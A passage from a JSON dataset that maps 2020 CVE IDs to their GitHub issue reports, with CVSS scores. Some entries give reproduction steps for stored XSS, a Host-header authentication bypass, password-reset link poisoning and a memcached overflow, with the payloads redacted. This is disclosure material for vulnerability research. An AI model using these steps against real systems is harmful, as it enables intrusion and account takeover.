  46106. "description": "Stored Cross Site Scripting APITAG on Opencart Admin Dashboard. What version of APITAG are you reporting this for? Opencart NUMBERTAG Describe the bug Stored Cross Site Scripting (XSS) Authenticated is found in users image upload section in opencart admin panel. Opencart is accepting filenames with arbitrary code in it and not escaping them so the APITAG get executed. Malicious script in the admin dashboard can be injected permanently and can be used to steal the user\u2019s sensitive information like cookies, keystrokes, account information etc To Reproduce Steps to reproduce the behavior NUMBERTAG Go to PATHTAG and login with credentials NUMBERTAG Then navigate to APITAG and click on Action button on top right corner. FILETAG NUMBERTAG Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload \"> APITAG and then upload it as new user profile image NUMBERTAG After the upload completes the XSS pop up executes as shown below and it will gets executed each time someone visits the Image manager section. FILETAG Expected behavior Escaping and sanitation of HTML tags/ Special characters before storing or processing them, so that the code does not executes. Although XSS was strictly filtered on other sections, here we were able to execute it because of filename so filenames, file extensions and headers should be analyzed to prevent XSS and other file upload vulnerabilities. Screenshots / Screen recordings FILETAG Server / Test environment (please complete the following information): Kali Linu NUMBERTAG PHP version NUMBERTAG Apache version NUMBERTAG Browser(s) tested with: Mozilla Firefox Latest Build",
  46107. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  46108. "severity": "MEDIUM",
  46109. "baseScore": 5.4,
  46110. "impactScore": 2.7,
  46111. "exploitabilityScore": 2.3
  46112. },
  46113. {
  46114. "CVE_ID": "CVE-2020-10672",
  46115. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2659",
  46116. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2659",
  46117. "Repo_new": "fasterxml/jackson-databind",
  46118. "Issue_Created_At": "2020-03-16T00:52:40Z",
  46119. "description": "Block one more gadget type ( ). (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Reporters: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46120. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46121. "severity": "HIGH",
  46122. "baseScore": 8.8,
  46123. "impactScore": 5.9,
  46124. "exploitabilityScore": 2.8
  46125. },
  46126. {
  46127. "CVE_ID": "CVE-2020-10673",
  46128. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2660",
  46129. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2660",
  46130. "Repo_new": "fasterxml/jackson-databind",
  46131. "Issue_Created_At": "2020-03-18T01:32:04Z",
  46132. "description": "Block one more gadget type (TO BE FILLED). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Reporter: threedr3am Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46133. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46134. "severity": "HIGH",
  46135. "baseScore": 8.8,
  46136. "impactScore": 5.9,
  46137. "exploitabilityScore": 2.8
  46138. },
  46139. {
  46140. "CVE_ID": "CVE-2020-10675",
  46141. "Issue_Url_old": "https://github.com/buger/jsonparser/issues/188",
  46142. "Issue_Url_new": "https://github.com/buger/jsonparser/issues/188",
  46143. "Repo_new": "buger/jsonparser",
  46144. "Issue_Created_At": "2020-03-09T10:40:07Z",
  46145. "description": "infinite loop in Delete. Hi. A call to function Delete may cause infinite loop. I wish you could take a look. URLTAG ERRORTAG",
  46146. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  46147. "severity": "HIGH",
  46148. "baseScore": 7.5,
  46149. "impactScore": 3.6,
  46150. "exploitabilityScore": 3.9
  46151. },
  46152. {
  46153. "CVE_ID": "CVE-2020-10678",
  46154. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6258",
  46155. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6258",
  46156. "Repo_new": "octopusdeploy/issues",
  46157. "Issue_Created_At": "2020-03-17T01:40:34Z",
  46158. "description": "Authentication provider sync error. Details coming soon",
  46159. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  46160. "severity": "HIGH",
  46161. "baseScore": 8.8,
  46162. "impactScore": 5.9,
  46163. "exploitabilityScore": 2.8
  46164. },
  46165. {
  46166. "CVE_ID": "CVE-2020-10683",
  46167. "Issue_Url_old": "https://github.com/dom4j/dom4j/issues/87",
  46168. "Issue_Url_new": "https://github.com/dom4j/dom4j/issues/87",
  46169. "Repo_new": "dom4j/dom4j",
  46170. "Issue_Created_At": "2020-04-22T11:10:29Z",
  46171. "description": "APITAG uses system APITAG or APITAG which has unsecure defaults. The constructor APITAG calls one of the factory method form Java runtime library \u2013 APITAG or APITAG . These factory methods do not have safe defaults, such as downloading external entities. Create the new factory method APITAG which overrides Java runtime library defaults and sets following features: CODETAG",
  46172. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46173. "severity": "CRITICAL",
  46174. "baseScore": 9.8,
  46175. "impactScore": 5.9,
  46176. "exploitabilityScore": 3.9
  46177. },
  46178. {
  46179. "CVE_ID": "CVE-2020-10688",
  46180. "Issue_Url_old": "https://github.com/quarkusio/quarkus/issues/7248",
  46181. "Issue_Url_new": "https://github.com/quarkusio/quarkus/issues/7248",
  46182. "Repo_new": "quarkusio/quarkus",
  46183. "Issue_Created_At": "2020-02-18T08:07:18Z",
  46184. "description": "XSS vulnerability in APITAG Description The no resource endpoint HTML page which is rendered on ERRORTAG errors introduces XSS vulnerability. Given as an example a GET endpoint which accepts a paging parameter in the form \"start,offset\" (i.e NUMBERTAG A request like: APITAG would lead to the following exception, and the ERRORTAG page in turn would execute the script (alert in our case). ERRORTAG Implementation ideas Enable the ERRORTAG HTML page only in DEV mode.",
  46185. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46186. "severity": "MEDIUM",
  46187. "baseScore": 6.1,
  46188. "impactScore": 2.7,
  46189. "exploitabilityScore": 2.8
  46190. },
  46191. {
  46192. "CVE_ID": "CVE-2020-10689",
  46193. "Issue_Url_old": "https://github.com/eclipse/che/issues/15651",
  46194. "Issue_Url_new": "https://github.com/eclipse/che/issues/15651",
  46195. "Repo_new": "eclipse/che",
  46196. "Issue_Created_At": "2020-01-10T11:56:26Z",
  46197. "description": "Improve isolation of Che theia and che machine exec components. Is your task related to a problem? Please describe. Under some conditions, there is a possibility to reach the port of one workspace from another workspace. To improve the isolation of the major Eclipse Che components we would like to. Describe the solution you'd like NUMBERTAG Use single pod for jwt proxy and other workspace containers NUMBERTAG make machine exec, theia remote runtime and theia endpoints listening to localhost only Describe alternatives you've considered n/a Additional context n/a",
  46198. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  46199. "severity": "MEDIUM",
  46200. "baseScore": 6.8,
  46201. "impactScore": 5.9,
  46202. "exploitabilityScore": 0.9
  46203. },
  46204. {
  46205. "CVE_ID": "CVE-2020-10699",
  46206. "Issue_Url_old": "https://github.com/open-iscsi/targetcli-fb/issues/162",
  46207. "Issue_Url_new": "https://github.com/open-iscsi/targetcli-fb/issues/162",
  46208. "Repo_new": "open-iscsi/targetcli-fb",
  46209. "Issue_Created_At": "2020-03-23T05:08:02Z",
  46210. "description": "PATHTAG is world writable. The systemd socket unit fails to specify any APITAG so the socket is world writable NUMBERTAG as such any user can connect to it and send commands to targetclid without authentication. This is a likely a security vulnerability. URLTAG",
  46211. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  46212. "severity": "HIGH",
  46213. "baseScore": 7.8,
  46214. "impactScore": 5.9,
  46215. "exploitabilityScore": 1.8
  46216. },
  46217. {
  46218. "CVE_ID": "CVE-2020-10729",
  46219. "Issue_Url_old": "https://github.com/ansible/ansible/issues/34144",
  46220. "Issue_Url_new": "https://github.com/ansible/ansible/issues/34144",
  46221. "Repo_new": "ansible/ansible",
  46222. "Issue_Created_At": "2017-12-21T14:02:15Z",
  46223. "description": "two random password lookups in same task return same value. ISSUE TYPE Bug Report COMPONENT NAME lookups ANSIBLE VERSION APITAG CONFIGURATION no custom config OS / ENVIRONMENT Linux SUMMARY two consecutive tasks that set facts from password lookup with same length get identical values. separate tasks or different length result in different values, as expected. STEPS TO REPRODUCE yaml name: Set random passwords for clusters set_fact: password1: \"{{ lookup('password', PATHTAG length NUMBERTAG password2: \"{{ lookup('password', PATHTAG length NUMBERTAG delegate_to: localhost delegate_facts: True debug: msg: APITAG APITAG EXPECTED RESULTS two different values ACTUAL RESULTS two identical values changing length for one of these, or using separate tasks, gives different values. URLTAG says \"A special case is using /dev/null as a path. The password lookup will generate a new random password each time\", thus the current behaviour is at least confusing and unexpected. from irc : CODETAG `",
  46224. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  46225. "severity": "MEDIUM",
  46226. "baseScore": 5.5,
  46227. "impactScore": 3.6,
  46228. "exploitabilityScore": 1.8
  46229. },
  46230. {
  46231. "CVE_ID": "CVE-2020-10732",
  46232. "Issue_Url_old": "https://github.com/google/kmsan/issues/76",
  46233. "Issue_Url_new": "https://github.com/google/kmsan/issues/76",
  46234. "Repo_new": "google/kmsan",
  46235. "Issue_Created_At": "2020-04-18T09:13:03Z",
  46236. "description": "BUG: KMSAN: uninit value in kmsan_handle_dma. While fuzzing latest KMSAN build with HEALER(syscall fuzzer, not published yet), uninit value is found in kmsan_handle_dma. It seems KMSAN found bugs in itself. Caused by this call sequence FILETAG . With this crash FILETAG . THE latest KMSAN is used with this config FILETAG .",
  46237. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
  46238. "severity": "MEDIUM",
  46239. "baseScore": 4.4,
  46240. "impactScore": 2.5,
  46241. "exploitabilityScore": 1.8
  46242. },
  46243. {
  46244. "CVE_ID": "CVE-2020-10799",
  46245. "Issue_Url_old": "https://github.com/deeplook/svglib/issues/229",
  46246. "Issue_Url_new": "https://github.com/deeplook/svglib/issues/229",
  46247. "Repo_new": "deeplook/svglib",
  46248. "Issue_Created_At": "2020-02-25T11:18:21Z",
  46249. "description": "No disabling external entity expansion (XXE). Hi! I found that I can perform XXE attack when using svg2rlg function Code: CODETAG Payload APITAG CODETAG",
  46250. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46251. "severity": "CRITICAL",
  46252. "baseScore": 9.8,
  46253. "impactScore": 5.9,
  46254. "exploitabilityScore": 3.9
  46255. },
  46256. {
  46257. "CVE_ID": "CVE-2020-10807",
  46258. "Issue_Url_old": "https://github.com/mitre/caldera/issues/1405",
  46259. "Issue_Url_new": "https://github.com/mitre/caldera/issues/1405",
  46260. "Repo_new": "mitre/caldera",
  46261. "Issue_Created_At": "2020-03-18T15:12:57Z",
  46262. "description": "Serious Security Flaw: API Requests from localhost. Hi guys, While checking our your API I've found a serious security flaw, which allows any unauthenticated user to perform any kind of API requests, which basically makes the whole tool and therefore any agents on end hosts exposable to anyone having access to the Caldera REST API. The following function is responsible for checking authentication in your code: ERRORTAG Basically it allows to bypass authentication if APITAG is contained within APITAG (which is set to APITAG per default). You are using the aiohttp library, in which host is usually the Host header of the http request (see URLTAG This works fine if you are performing a curl request from localhost for example, but be aware that the HTTP Host header is mutable for any request performed by a user. So if you just overwrite the Host header with \"localhost NUMBERTAG while performing a request to a public IP for example Caldera assumes you are performing the request to localhost and therefore disables authentication checks. Here is a POC in Postman: APITAG Body of the request: APITAG Response: APITAG As you can see I've succesfully performed an API request while using a IP within my network and not localhost. I've set the Host header to localhost and were able to fetch details without any authentication. That really is a serious flaw in the application, if I have running productive agents an attacker can execute arbitrary commands in my network. I'd suggest removing the no authentication \"feature\" for requests to localhost completely. Thanks!",
  46263. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46264. "severity": "MEDIUM",
  46265. "baseScore": 5.3,
  46266. "impactScore": 1.4,
  46267. "exploitabilityScore": 3.9
  46268. },
  46269. {
  46270. "CVE_ID": "CVE-2020-10870",
  46271. "Issue_Url_old": "https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028",
  46272. "Issue_Url_new": "https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028",
  46273. "Repo_new": "zim-desktop-wiki/zim-desktop-wiki",
  46274. "Issue_Created_At": "2020-03-06T22:22:48Z",
  46275. "description": "Predictable /tmp/zim USER directory allows for denial of service. Description Zim creates temporary directories with predictable names. A malicious user could predict and create Zim's temporary directories and prevent other users from being able to start Zim, resulting in a denial of service. Steps to Reproduce NUMBERTAG Create two users: user1 and user NUMBERTAG As user1: APITAG NUMBERTAG As user2: Start Zim Zim will attempt to change the permissions of /tmp/user2 to NUMBERTAG Because /tmp/user2 is actually owned by user1, the call to APITAG will fail and Zim will crash. Workaround An affected user can set the $TMP or $TMPDIR environment variables to point to somewhere that is not world writable (e.g. APITAG ). Version Affected NUMBERTAG and later Operating System Linux Severity Low",
  46276. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  46277. "severity": "MEDIUM",
  46278. "baseScore": 5.5,
  46279. "impactScore": 3.6,
  46280. "exploitabilityScore": 1.8
  46281. },
  46282. {
  46283. "CVE_ID": "CVE-2020-10871",
  46284. "Issue_Url_old": "https://github.com/openwrt/luci/issues/3766",
  46285. "Issue_Url_new": "https://github.com/openwrt/luci/issues/3766",
  46286. "Repo_new": "openwrt/luci",
  46287. "Issue_Created_At": "2020-03-18T20:35:13Z",
  46288. "description": "security: information disclosure to unauthenticated guest. Recent openwrt builds show the administration menu to unauthenticated guests: an attacker would be able to know the presence of installed packages and services on the box. version banner: APITAG by APITAG Master (git NUMBERTAG APITAG NUMBERTAG ed0d NUMBERTAG APITAG SNAPSHOT r NUMBERTAG b NUMBERTAG b_ FILETAG",
  46289. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46290. "severity": "MEDIUM",
  46291. "baseScore": 5.3,
  46292. "impactScore": 1.4,
  46293. "exploitabilityScore": 3.9
  46294. },
  46295. {
  46296. "CVE_ID": "CVE-2020-10871",
  46297. "Issue_Url_old": "https://github.com/openwrt/luci/issues/3653",
  46298. "Issue_Url_new": "https://github.com/openwrt/luci/issues/3653",
  46299. "Repo_new": "openwrt/luci",
  46300. "Issue_Created_At": "2020-02-19T22:37:08Z",
  46301. "description": "Header topmenu shown logged out. On commit r NUMBERTAG a NUMBERTAG b NUMBERTAG a the topmenu \" APITAG \" is shown while no user logged in. FILETAG Any idea how to solve this issue? Thank you.",
  46302. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46303. "severity": "MEDIUM",
  46304. "baseScore": 5.3,
  46305. "impactScore": 1.4,
  46306. "exploitabilityScore": 3.9
  46307. },
  46308. {
  46309. "CVE_ID": "CVE-2020-10871",
  46310. "Issue_Url_old": "https://github.com/openwrt/luci/issues/3563",
  46311. "Issue_Url_new": "https://github.com/openwrt/luci/issues/3563",
  46312. "Repo_new": "openwrt/luci",
  46313. "Issue_Created_At": "2020-01-25T21:59:41Z",
  46314. "description": "luci base: menu and i NUMBERTAG n plays very BADLY with sysauth=false in master. APITAG pages with sysauth=false (e.g. status pages that should work even for an user that is not logged in) are broken on APITAG master. The symptom is that when you access the page with \"sysauth=false\" attribute, the menu disappears, as in: not even nodes that are also sysauth=false show up. What should happen: the menu should list all pages, always, and require authentication if you try to access one of them while lacking the required credentials. Translations are also broken, and doubly so NUMBERTAG They try to XHR something from a node that is below /admin/, even if you are on a node on an entirely different subtree (like say, a /status node that should work unauthenticated and be the first page the user gets when he connects to the modem NUMBERTAG Whatever the translation stuff tries to fetch is hiding behind a sysauth=true node, which renders it useless for any sysauth=false page [if the user is unauthenticated] Maybe the /l NUMBERTAG n/ or /i NUMBERTAG n/ namespace (or even wherever luci static ends up) should be used for anything the i NUMBERTAG n mechanism needs? It really doesn't make sense to have it tied to /admin/.",
  46315. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46316. "severity": "MEDIUM",
  46317. "baseScore": 5.3,
  46318. "impactScore": 1.4,
  46319. "exploitabilityScore": 3.9
  46320. },
  46321. {
  46322. "CVE_ID": "CVE-2020-10931",
  46323. "Issue_Url_old": "https://github.com/memcached/memcached/issues/629",
  46324. "Issue_Url_new": "https://github.com/memcached/memcached/issues/629",
  46325. "Repo_new": "memcached/memcached",
  46326. "Issue_Created_At": "2020-03-23T09:21:26Z",
  46327. "description": "(DOS attack NUMBERTAG day buffer overflow vulnerability reveal. Hi, Memcached team, Recently, I revealed a buffer overflow vulnerability which may cause DOS attack. The exploit details can be found as following. Affect Version memcached NUMBERTAG memcached NUMBERTAG Root cause file location: APITAG NUMBERTAG FILETAG Code Audit CODETAG in line NUMBERTAG since there is no mechanism to verify the parameter's length, in this case, the length of \" extlen \" when calling memcpy function, It will cause buffer overflow if large value assigned to the extlen variable. POC APITAG for the POC snippet, first, if I assign a large value to the variable extlen , on the other hand, in order to bypass the validation of data packet which sent in following code snippet, APITAG we can construct a very large data packet. After that, the program will crash because of the issue mentioned above. Note: Please confirm this issue ASAP. Besides, just letting you know, I am gonna submit this issue to CVE mitre. Please let me if you have any questions. Sincerely, Icejl",
  46328. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  46329. "severity": "HIGH",
  46330. "baseScore": 7.5,
  46331. "impactScore": 3.6,
  46332. "exploitabilityScore": 3.9
  46333. },
  46334. {
  46335. "CVE_ID": "CVE-2020-10944",
  46336. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7468",
  46337. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7468",
  46338. "Repo_new": "hashicorp/nomad",
  46339. "Issue_Created_At": "2020-03-24T15:29:53Z",
  46340. "description": "Reserved issue. This a reserved issue for NUMBERTAG release.",
  46341. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  46342. "severity": "MEDIUM",
  46343. "baseScore": 5.4,
  46344. "impactScore": 2.7,
  46345. "exploitabilityScore": 2.3
  46346. },
  46347. {
  46348. "CVE_ID": "CVE-2020-10966",
  46349. "Issue_Url_old": "https://github.com/hestiacp/hestiacp/issues/748",
  46350. "Issue_Url_new": "https://github.com/hestiacp/hestiacp/issues/748",
  46351. "Repo_new": "hestiacp/hestiacp",
  46352. "Issue_Created_At": "2020-03-23T06:15:49Z",
  46353. "description": "Manipulation of Host Header lead to Account Takeover Vulnerability. Tbh, vulnerability is pretty simple. On line NUMBERTAG SERVER FILETAG So that means, $_SERVER FILETAG Actual Host header value \u0130S NOT hacker.com but the URL will be hacker.com in the password reset e mail. As you can following screenshot, even though the Vesta is being installed on APITAG on port NUMBERTAG URL placed in the e mail for account recovery is HACKER.com now. So if the admin user click on that link in the e mail, HACKER.COM will steal the code value which is enough for resetting password of the admin user. PS: I should mention that in the real life use case you can very similar domain name instead of hacker.com :) Since the e mail is being sanded from Vesta server, it\u2019s not a kind of phishing attack. FILETAG",
  46354. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  46355. "severity": "MEDIUM",
  46356. "baseScore": 6.5,
  46357. "impactScore": 3.6,
  46358. "exploitabilityScore": 2.8
  46359. },
  46360. {
  46361. "CVE_ID": "CVE-2020-10968",
  46362. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2662",
  46363. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2662",
  46364. "Repo_new": "fasterxml/jackson-databind",
  46365. "Issue_Created_At": "2020-03-23T01:31:30Z",
  46366. "description": "Block one more gadget type (...). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46367. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46368. "severity": "HIGH",
  46369. "baseScore": 8.8,
  46370. "impactScore": 5.9,
  46371. "exploitabilityScore": 2.8
  46372. },
  46373. {
  46374. "CVE_ID": "CVE-2020-10969",
  46375. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2642",
  46376. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2642",
  46377. "Repo_new": "fasterxml/jackson-databind",
  46378. "Issue_Created_At": "2020-03-04T00:05:00Z",
  46379. "description": "Block one more gadget type APITAG CVE to be allocated). (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: to be allocated Reporters: threedr3am Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46380. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46381. "severity": "HIGH",
  46382. "baseScore": 8.8,
  46383. "impactScore": 5.9,
  46384. "exploitabilityScore": 2.8
  46385. },
  46386. {
  46387. "CVE_ID": "CVE-2020-10990",
  46388. "Issue_Url_old": "https://github.com/Accenture/mercury/issues/13",
  46389. "Issue_Url_new": "https://github.com/accenture/mercury/issues/13",
  46390. "Repo_new": "accenture/mercury",
  46391. "Issue_Created_At": "2020-01-06T00:12:35Z",
  46392. "description": "Security Contact Requested. MENTIONTAG and I found a security vulnerability within the mercury project. We were hoping to get a core maintainer's contact details to responsibly disclose this vulnerability.",
  46393. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46394. "severity": "CRITICAL",
  46395. "baseScore": 9.8,
  46396. "impactScore": 5.9,
  46397. "exploitabilityScore": 3.9
  46398. },
  46399. {
  46400. "CVE_ID": "CVE-2020-10991",
  46401. "Issue_Url_old": "https://github.com/mulesoft/apikit/issues/547",
  46402. "Issue_Url_new": "https://github.com/mulesoft/apikit/issues/547",
  46403. "Repo_new": "mulesoft/apikit",
  46404. "Issue_Created_At": "2020-03-25T08:01:53Z",
  46405. "description": "XXE in apikit. While reading the code in the apikit project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG",
  46406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46407. "severity": "CRITICAL",
  46408. "baseScore": 9.8,
  46409. "impactScore": 5.9,
  46410. "exploitabilityScore": 3.9
  46411. },
  46412. {
  46413. "CVE_ID": "CVE-2020-10992",
  46414. "Issue_Url_old": "https://github.com/azkaban/azkaban/issues/2478",
  46415. "Issue_Url_new": "https://github.com/azkaban/azkaban/issues/2478",
  46416. "Repo_new": "azkaban/azkaban",
  46417. "Issue_Created_At": "2020-03-25T08:03:26Z",
  46418. "description": "XXE in Azkaban. While reading the code in the Azkaban project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG URLTAG",
  46419. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46420. "severity": "CRITICAL",
  46421. "baseScore": 9.8,
  46422. "impactScore": 5.9,
  46423. "exploitabilityScore": 3.9
  46424. },
  46425. {
  46426. "CVE_ID": "CVE-2020-10993",
  46427. "Issue_Url_old": "https://github.com/osmandapp/Osmand/issues/8711",
  46428. "Issue_Url_new": "https://github.com/osmandapp/osmand/issues/8711",
  46429. "Repo_new": "osmandapp/osmand",
  46430. "Issue_Created_At": "2020-03-25T08:02:39Z",
  46431. "description": "XXE in Osmand. While reading the code in the Osmand project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG",
  46432. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  46433. "severity": "CRITICAL",
  46434. "baseScore": 9.1,
  46435. "impactScore": 5.2,
  46436. "exploitabilityScore": 3.9
  46437. },
  46438. {
  46439. "CVE_ID": "CVE-2020-11004",
  46440. "Issue_Url_old": "https://github.com/Admidio/admidio/issues/908",
  46441. "Issue_Url_new": "https://github.com/admidio/admidio/issues/908",
  46442. "Repo_new": "admidio/admidio",
  46443. "Issue_Created_At": "2020-04-06T12:29:36Z",
  46444. "description": "Unauthenticated Blind SQL injection. Hi, I want to report a critical vulnerability in Admidio management system. Can you please start a security advisory in the security section and add me so we can discuss the vulnerability privately?",
  46445. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  46446. "severity": "HIGH",
  46447. "baseScore": 7.5,
  46448. "impactScore": 3.6,
  46449. "exploitabilityScore": 3.9
  46450. },
  46451. {
  46452. "CVE_ID": "CVE-2020-11005",
  46453. "Issue_Url_old": "https://github.com/SeppPenner/WindowsHello/issues/3",
  46454. "Issue_Url_new": "https://github.com/sepppenner/windowshello/issues/3",
  46455. "Repo_new": "sepppenner/windowshello",
  46456. "Issue_Created_At": "2019-08-22T02:16:23Z",
  46457. "description": "APITAG Security of the Encrypted data. If I use this library to encrypt text and write the output to a txt file, could another executable be able to decrypt the text using the static method APITAG from this same library, without the need to use Windows Hello Authentication? Maybe for somebody the answer to this question is clear from the code, but I'm just learning, and I do it in my spare time. Thanks.",
  46458. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  46459. "severity": "MEDIUM",
  46460. "baseScore": 5.5,
  46461. "impactScore": 3.6,
  46462. "exploitabilityScore": 1.8
  46463. },
  46464. {
  46465. "CVE_ID": "CVE-2020-11014",
  46466. "Issue_Url_old": "https://github.com/simpleledger/Electron-Cash-SLP/issues/126",
  46467. "Issue_Url_new": "https://github.com/simpleledger/electron-cash-slp/issues/126",
  46468. "Repo_new": "simpleledger/electron-cash-slp",
  46469. "Issue_Created_At": "2020-04-24T17:37:42Z",
  46470. "description": "Mint baton sent to token receiver address.",
  46471. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
  46472. "severity": "HIGH",
  46473. "baseScore": 8.6,
  46474. "impactScore": 4.0,
  46475. "exploitabilityScore": 3.9
  46476. },
  46477. {
  46478. "CVE_ID": "CVE-2020-11042",
  46479. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6010",
  46480. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6010",
  46481. "Repo_new": "freerdp/freerdp",
  46482. "Issue_Created_At": "2020-03-31T06:54:51Z",
  46483. "description": "memory out of bounds read in update_read_icon_info. version APITAG vuln code APITAG first read APITAG , APITAG and APITAG from the APITAG CODETAG And then it check APITAG and APITAG APITAG Then it could call APITAG to read data from s, size is APITAG CODETAG so when APITAG and APITAG , it could lead memory out of bounds read",
  46484. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H",
  46485. "severity": "MEDIUM",
  46486. "baseScore": 5.9,
  46487. "impactScore": 5.2,
  46488. "exploitabilityScore": 0.7
  46489. },
  46490. {
  46491. "CVE_ID": "CVE-2020-11044",
  46492. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6013",
  46493. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6013",
  46494. "Repo_new": "freerdp/freerdp",
  46495. "Issue_Created_At": "2020-03-31T11:10:29Z",
  46496. "description": "double free in APITAG version APITAG vuln code APITAG first read new_len from stream, and pass the new_len to realloc Then it could call APITAG , this could free APITAG , and return NULL realloc function source code CODETAG when new_data is NULL, it could call free_cache_bitmap NUMBERTAG order to free APITAG again. Double Free! function code. CODETAG",
  46497. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46498. "severity": "LOW",
  46499. "baseScore": 2.2,
  46500. "impactScore": 1.4,
  46501. "exploitabilityScore": 0.7
  46502. },
  46503. {
  46504. "CVE_ID": "CVE-2020-11045",
  46505. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6005",
  46506. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6005",
  46507. "Repo_new": "freerdp/freerdp",
  46508. "Issue_Created_At": "2020-03-31T01:42:42Z",
  46509. "description": "memory out of bounds read in update_read_bitmap_data. vuln code ERRORTAG The function first verifies that the length of s cannot be less than NUMBERTAG and then reads NUMBERTAG bytes later. If APITAG and APITAG , it will continue to read data from the stream without check if the length in the stream is enough",
  46510. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L",
  46511. "severity": "LOW",
  46512. "baseScore": 3.3,
  46513. "impactScore": 2.5,
  46514. "exploitabilityScore": 0.7
  46515. },
  46516. {
  46517. "CVE_ID": "CVE-2020-11046",
  46518. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6006",
  46519. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6006",
  46520. "Repo_new": "freerdp/freerdp",
  46521. "Issue_Created_At": "2020-03-31T02:32:52Z",
